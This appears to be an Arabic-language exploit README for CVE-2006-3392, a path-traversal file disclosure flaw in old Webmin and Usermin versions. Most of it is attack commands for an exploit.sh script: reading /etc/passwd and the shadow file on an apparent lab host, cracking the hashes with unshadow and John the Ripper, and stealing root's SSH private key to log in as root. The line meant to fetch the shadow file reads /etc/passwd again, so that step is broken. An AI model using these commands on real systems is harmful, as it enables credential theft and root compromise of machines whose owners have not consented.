
Webmin < 1.290 / Usermin < 1.220 - الإفصاح التعسفي عن الملفات
https://www.cvedetails.com/cve/CVE-2006-3392/
تستدعي Webmin قبل الإصدار 1.290 وUsermin قبل الإصدار 1.220 دالة simplify_path قبل فك ترميز HTML، مما يسمح للمهاجمين عن بُعد بقراءة ملفات عشوائية، كما هو موضح باستخدام تسلسلات "..%01"، التي تتجاوز إزالة تسلسلات "../" قبل إزالة وحدات البايت مثل "%01" من اسم الملف. ملاحظة: هذه مشكلة مختلفة عن CVE-2006-3274.
تصفح أي ملف في نظام الملفات بامتيازات الجذر
./exploit.sh <target ip> <target port> <file to disclose>
تصفح ملفي passwd وshadow على 10.10.11.105، ثم قم بفك الدمج وكسر التجزئات
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
تصفح مفتاح RSA الخاص على 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
لا تتردد في الاستخدام أو التعديل متى وأينما تشاء